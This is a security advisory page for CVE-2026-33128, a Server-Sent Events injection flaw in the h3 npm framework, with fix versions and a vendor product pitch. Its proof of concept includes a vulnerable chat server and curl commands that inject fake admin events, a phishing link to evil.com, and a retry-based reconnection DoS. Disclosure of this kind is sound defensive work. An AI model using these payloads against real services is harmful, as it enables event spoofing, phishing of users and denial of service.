Summary
createEventStream in h3 is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients.
Details
The vulnerability exists in src/utils/internal/event-stream.ts, lines 170-187:
export function formatEventStreamComment(comment: string): string {
return `: ${comment}\n\n`;
}
export function formatEventStreamMessage(message: EventStreamMessage): string {
let result = "";
if (message.id) {
result += `id: ${message.id}\n`;
}
if (message.event) {
result += `event: ${message.event}\n`;
}
if (typeof message.retry === "number" && Number.isInteger(message.retry)) {
result += `retry: ${message.retry}\n`;
}
result += `data: ${message.data}\n\n`;
return result;
}
The SSE protocol (defined in the WHATWG HTML spec) uses newline characters (\n) as field delimiters and double newlines (\n\n) as event separators.
None of the fields (id, event, data, comment) are sanitized for newline characters before being interpolated into the SSE wire format. If any field value contains \n, the SSE framing is broken, allowing an attacker to:
- Inject arbitrary SSE fields, break out of one field and add
event:,data:,id:, orretry:directives - Inject entirely new SSE events, using
\n\nto terminate the current event and start a new one - Manipulate reconnection behavior, inject
retry: 1to force aggressive reconnection (DoS) - Override Last-Event-ID, inject
id:to manipulate which events are replayed on reconnection
Injection via the event field
Intended wire format: Actual wire format (with \n injection):
event: message event: message
data: attacker: hey event: admin ← INJECTED
data: ALL_USERS_HACKED ← INJECTED
data: attacker: hey
The browser's EventSource API parses these as two separate events: one message event and one admin event.
Injection via the data field
Intended: Actual (with \n\n injection):
event: message event: message
data: bob: hi data: bob: hi
← event boundary
event: system ← INJECTED event
data: Reset: evil.com ← INJECTED data
Before exploit:
PoC
Vulnerable server (sse-server.ts)
A realistic chat/notification server that broadcasts user input via SSE:
import { H3, createEventStream, getQuery } from "h3";
import { serve } from "h3/node";
const app = new H3();
const clients: any[] = [];
app.get("/events", (event) => {
const stream = createEventStream(event);
clients.push(stream);
stream.onClosed(() => {
clients.splice(clients.indexOf(stream), 1);
stream.close();
});
return stream.send();
});
app.get("/send", async (event) => {
const query = getQuery(event);
const user = query.user as string;
const msg = query.msg as string;
const type = (query.type as string) || "message";
for (const client of clients) {
await client.push({ event: type, data: `${user}: ${msg}` });
}
return { status: "sent" };
});
serve({ fetch: app.fetch });
Exploit
# 1. Inject fake "admin" event via event field
curl -s "http://localhost:3000/send?user=attacker&msg=hey&type=message%0aevent:%20admin%0adata:%20SYSTEM:%20Server%20shutting%20down"
# 2. Inject separate phishing event via data field
curl -s "http://localhost:3000/send?user=bob&msg=hi%0a%0aevent:%20system%0adata:%20Password%20reset:%20http://evil.com/steal&type=message"
# 3. Inject retry directive for reconnection DoS
curl -s "http://localhost:3000/send?user=x&msg=test%0aretry:%201&type=message"
Raw wire format proving injection
event: message
event: admin
data: ALL_USERS_COMPROMISED
data: attacker: legit
The browser's EventSource fires this as an admin event with data ALL_USERS_COMPROMISED, entirely controlled by the attacker.
Proof:
Impact
An attacker who can influence any field of an SSE message (common in chat applications, notification systems, live dashboards, AI streaming responses, and collaborative tools) can inject arbitrary SSE events that all connected clients will process as legitimate.
Attack scenarios:
- Cross-user content injection, inject fake messages in chat applications
- Phishing, inject fake system notifications with malicious links
- Event spoofing, trigger client-side handlers for privileged event types (e.g.,
admin,system) - Reconnection DoS, inject
retry: 1to force all clients to reconnect every 1ms - Last-Event-ID manipulation, override the event ID to cause event replay or skipping on reconnection
This is a framework-level vulnerability, not a developer misconfiguration, the framework's API accepts arbitrary strings but does not enforce the SSE protocol's invariant that field values must not contain newlines.
CVE-2026-33128 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.1-rc.15, 1.15.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
h3 to 2.0.1-rc.15 or later; h3 to 1.15.6 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33128? CVE-2026-33128 is a high-severity security vulnerability in h3 (npm), affecting versions >= 2.0.0, <= 2.0.1-rc.14. It is fixed in 2.0.1-rc.15, 1.15.6.
- How severe is CVE-2026-33128? CVE-2026-33128 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of h3 are affected by CVE-2026-33128? h3 (npm) versions >= 2.0.0, <= 2.0.1-rc.14 is affected.
- Is there a fix for CVE-2026-33128? Yes. CVE-2026-33128 is fixed in 2.0.1-rc.15, 1.15.6. Upgrade to this version or later.
- Is CVE-2026-33128 exploitable, and should I be worried? Whether CVE-2026-33128 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33128 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33128?
- Upgrade
h3to 2.0.1-rc.15 or later - Upgrade
h3to 1.15.6 or later
- Upgrade